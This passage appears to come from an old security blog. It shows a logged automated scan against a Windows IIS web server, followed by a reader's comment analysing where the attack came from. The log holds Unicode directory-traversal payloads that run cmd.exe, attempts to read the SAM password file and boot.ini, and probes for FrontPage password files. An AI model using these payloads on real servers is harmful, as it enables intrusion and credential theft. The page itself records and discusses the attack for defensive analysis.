-HEAD /cgi-Bin/wguest.exe HTTP/1.1

-HEAD /cgi-bin/visitor.exe HTTP/1.1

-HEAD /cgi-bin/visadmin.exe?user=guest
HTTP/1.1

-HEAD /cgi-bin/visadmin.exe HTTP/1.1

-HEAD /cgi-bin/tst.bat\dir HTTP/1.1

-HEAD /cgi-bin/tst.bat HTTP/1.1

-HEAD /cgi-bin/test.bat HTTP/1.1

-HEAD /cgi-bin/snorkerz.cmd HTTP/1.1

-GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD /cgi-bin/snorkerz.bat HTTP/1.1

-HEAD /cgi-bin/search97.vts HTTP/1.1

-HEAD /cgi-bin/scripts/perl.exe
HTTP/1.1

-HEAD /cgi-bin/sam._ HTTP/1.1

-HEAD /cgi-bin/rguest.exe HTTP/1.1

-HEAD /Cgi-Bin/rguest.exe HTTP/1.1

-HEAD /cgi-bin/ppdscgi.exe HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD /cgi-bin/perl.exe HTTP/1.1

-HEAD /Cgi-Bin/perl.exe HTTP/1.1

-HEAD /cgi-bin/mailform.exe HTTP/1.1

-HEAD /cgi-bin/input2.bat HTTP/1.1

-HEAD /cgi-bin/input.bat HTTP/1.1

-HEAD /cgi-bin/imagemap.exe HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/anot.htr
HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/aexp2.htr
HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/aexp.htr
HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/achg.htr
HTTP/1.1

-HEAD /cgi-bin/htimage.exe HTTP/1.1

-HEAD /Cgi-Bin/htimage.exe HTTP/1.1

-HEAD /Cgi-Bin/hello.bat HTTP/1.1

-HEAD /cgi-bin/get32.exe\dir HTTP/1.1

-HEAD /cgi-bin/get32.exe HTTP/1.1

-HEAD /Cgi-Bin/get32.exe HTTP/1.1

-HEAD /cgi-bin/fpexplorer.exe HTTP/1.1

-HEAD /cgi-bin/fpexplore.exe HTTP/1.1

-HEAD /cgi-bin/fpcount.exe HTTP/1.1

-HEAD
/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/cgi-bin/..\..\..\../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/../../../../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /Cgi-Bin/ HTTP/1.1

-HEAD /cgi-bin HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type\winnt\repair\sam
\tHTTP/1.1

-HEAD /cgibin HTTP/1.1

-HEAD /cgi HTTP/1.1

-HEAD /cfusion/database/smpolicy.mdb
HTTP/1.1

-HEAD /cfusion/database/cypress.mdb
HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\*.cif/s/b
HTTP/1.1

-HEAD /cfusion/database/cfsnippets.mdb
HTTP/1.1

-HEAD
/cfusion/cfapps/security/realm_.mdb HTTP/1.1

-HEAD
/cfusion/cfapps/security/data/realm.mdb HTTP/1.1

-HEAD
/cfusion/cfapps/forums/data/forums.mdb HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\*.cif/s/b+dir+d:\*.cif/s/b
HTTP/1.1

-HEAD /cfide/administrator/index.cfm
HTTP/1.1

-HEAD /cfdocs/snippets/viewexample.cfm
HTTP/1.1

-HEAD
/cfdocs/snippets/gettempdirectory.cfm HTTP/1.1

-HEAD /cfdocs/snippets/fileexists.cfm
HTTP/1.1

-HEAD /cfdocs/snippets/evaluate.cfm
HTTP/1.1

-HEAD /cfdocs/root.cfm HTTP/1.1

-HEAD /cfdocs/expeval/sendmail.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/openfile.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/exprcalc.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/ExprCalc.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/eval.cfm HTTP/1.1

-HEAD
/cfdocs/expeval/displayopenedfile.cfm HTTP/1.1

-HEAD /cfdocs/expelval/sendmail.cfm
HTTP/1.1

-HEAD /cfdocs/expelval/openfile.cfm
HTTP/1.1

-HEAD /cfdocs/expelval/exprcalc.cfm
HTTP/1.1

-HEAD
/cfdocs/expelval/displayopenedfile.cfm HTTP/1.1

-HEAD /cfdocs/examples/parks/detail.cfm
HTTP/1.1

-HEAD
/cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.1

-HEAD
/cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.1

-HEAD
/cfdocs/exampleapp/email/getfile.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.1

-HEAD /cfdocs/cfmlsyntaxcheck.cfm
HTTP/1.1

-HEAD /cfcache.map HTTP/1.1

-HEAD /cfappman/index.cfm HTTP/1.1

-HEAD /catalog.nsf/ HTTP/1.1

-HEAD /catalog.nsf HTTP/1.1

-HEAD /carbo.dll HTTP/1.1

-HEAD /blabla.idq HTTP/1.1

-HEAD
/bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.1

-HEAD
/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/../../../../winnt/system32/cmd.exe/c+dir?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /bdir.htr HTTP/1.1

-HEAD /autoexec.bat HTTP/1.1

-HEAD
/ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.1

-HEAD /app.cfm HTTP/1.1

-HEAD
/AdvWorks/equipment/catalog_type.asp HTTP/1.1

-HEAD /adsamples/config/site.csc
HTTP/1.1

-HEAD /admisapi/fpadmin.htm HTTP/1.1

-HEAD /Admin_files/order.log HTTP/1.1

-HEAD /abczxv.htw HTTP/1.1

-HEAD
/a.asp/..\../..\../winnt/repair/sam HTTP/1.1

-HEAD /_vti_pvt/users.pwd HTTP/1.1

-HEAD /_vti_pvt/shtml.exe HTTP/1.1

-HEAD /_vti_pvt/shtml.dll HTTP/1.1

-HEAD /_vti_pvt/service.pwd HTTP/1.1

-HEAD /_vti_pvt/service.grp HTTP/1.1

-HEAD /_vti_pvt/doctodep.btr HTTP/1.1

-HEAD /_vti_pvt/authors.pwd HTTP/1.1

-HEAD /_vti_pvt/author.log HTTP/1.1

-HEAD /_vti_pvt/administrators.pwd
HTTP/1.1

-HEAD /_vti_pvt/administrator.pwd
HTTP/1.1

-HEAD /_vti_pvt/ HTTP/1.1

-HEAD /_vti_pvt HTTP/1.1

-HEAD /_vti_inf.html HTTP/1.1

-HEAD /_vti_bin/shtml.exe HTTP/1.1

-HEAD /_vti_bin/shtml.dll/_vti_rpc
HTTP/1.1

-HEAD /_vti_bin/shtml.dll HTTP/1.1

-HEAD /_vti_bin/fpexe HTTP/1.1

-HEAD /_vti_bin/fpcount.exe HTTP/1.1

-HEAD /_vti_bin/_vti_aut/dvwssr.dll
HTTP/1.1

-HEAD
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-OPTIONS / HTTP/1.1

-HEAD
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /_private/registrations.txt
HTTP/1.1

-HEAD /_private/register.txt HTTP/1.1

-HEAD /_private/orders.txt HTTP/1.1

-HEAD /_private/form_results.txt
HTTP/1.1

-HEAD /_private HTTP/1.1

-HEAD
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c
HTTP/1.1

-HEAD
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c
HTTP/1.1

-HEAD
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c HTTP/1.1

-HEAD
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c HTTP/1.1

-HEAD
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /_AuthChangeUrl? HTTP/1.1

-HEAD /_AuthChangeUrl HTTP/1.1

-HEAD /?PageServices HTTP/1.1

-HEAD /../../../../config.sys HTTP/1.1

-HEAD
/../../../../../winnt/repair/sam._ HTTP/1.1

-HEAD /../../../../../../../boot.ini
HTTP/1.1

-HEAD /../../../../all HTTP/1.1

-HEAD /....../all HTTP/1.1

-HEAD /....../ HTTP/1.1

-HEAD /Global.asa HTTP/1.1

-HEAD /........../autoexec.bat HTTP/1.1

-HEAD /*.idq HTTP/1.1

-HEAD /*.idc HTTP/1.1

-HEAD /*.ida HTTP/1.1

-GET /NULL.printer HTTP/1.1

-OPTIONS * HTTP/1.0

-HEAD /_vti_bin/_vti_aut/fp30reg.dll
HTTP/1.1

‹ Ramblings of a security fanatic: SSH Do old attacks go away ? ›
You want to find out more?
Submitted by DarkDigitalDream on Tue, 04/07/2009 - 14:55.

I've seen a few of these before. I found a link to another report of this kind of attack:

http://www.derkeiler.com/Mailing-Lists/securityfocus/incidents/2001-10/0...

These guys also got hit with the attack twice:
http://web2.names4ever.com/stats/usage_200110.html

I learned this by doing a quick web search of one of the more obscure filenames listed in the attack (/qweiop43809442fsfjflr.html).

Although the angle of attack is more or less the same across all these cases, the specific files targeted seem to differ. The one you have reported targets windows specifically (.bat, .dll, .exe files) and the first one I've linked at the top of this post does not. It targets python scripts (.pl) and the entire cgi-bin/ directory.

I'm curious to know if the program that has all these attacks compiled together goes as far as to scan the OS, web server, and other bits of information that are likely to be publicly available before targeting a specific range of attacks towards the server. What do you have on the logs immediately preceding this attack? If you can't get this information from the webserver directly, a quick nmap (or netstat, depending on your platform) could be even more revealing to an attacker. If they bothered to scan to find your specific software, your iis logs or wireshark would have picked it up.

If you wish to retrieve the exact tool that launched this attack, your best bet is to make the best profile you can of it with the data given, then check out milw0rm and see what kind of programs you can find that match the discovered behaviours.
www.milw0rm.com/
The script kiddie haven is even convenient enough as to have a search engine available, if I remember correctly.

The information learned from checking out these logs may be trivial, but at least you'll know if this particular s-kiddie has enough of an IQ to put his shoes on the proper feet. 10 points to our little friend if it scans for appropriate attack vectors before plugging tons of useless (and fruitless) requests to a victim's server. 100 points if you cant find the script that did this on milw0rm, showing some form of originality. I'm betting it scans before attacking. I'm also betting it's a publicly available script.

Edit: hmm, the links I have above date way back to 2001. Probably in the realm of 'nothing to see here, move along' by this point.